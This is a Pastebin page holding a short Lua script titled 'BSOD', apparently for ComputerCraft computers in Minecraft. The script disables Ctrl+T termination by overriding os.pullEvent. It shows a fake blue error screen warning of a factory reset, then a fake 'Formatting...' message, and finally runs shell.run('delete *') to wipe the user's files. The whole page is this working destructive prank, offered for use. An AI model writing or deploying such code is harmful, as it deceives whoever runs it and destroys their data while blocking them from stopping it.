Advertisement
SuperRavenSn1per

BSOD

Oct 7th, 2017
141
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 0.56 KB | None | 0 0
  1. sleep(0.1)
  2. os.pullEvent = os.pullEventRaw
  3. term.setBackgroundColor(colors.blue)
  4. term.setTextColor(colors.white)
  5. term.clear()
  6. term.setCursorPos(1,1)
  7. print("An error has been detected in rom/startup,")
  8. print("and will have to be removed.")
  9. print("This may cause a factory reset to occur.")
  10. print("")
  11. print("Upon losing files, contact us at GetRektM8.deadchicken")
  12. --Obviously not a real website!
  13. sleep(5)
  14. term.setBackgroundColor(colors.black)
  15. term.clear()
  16. term.setCursorPos(1,1)
  17. print("Formatting...")
  18. sleep(15)
  19. print("Format Complete!")
  20. shell.run("delete *")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement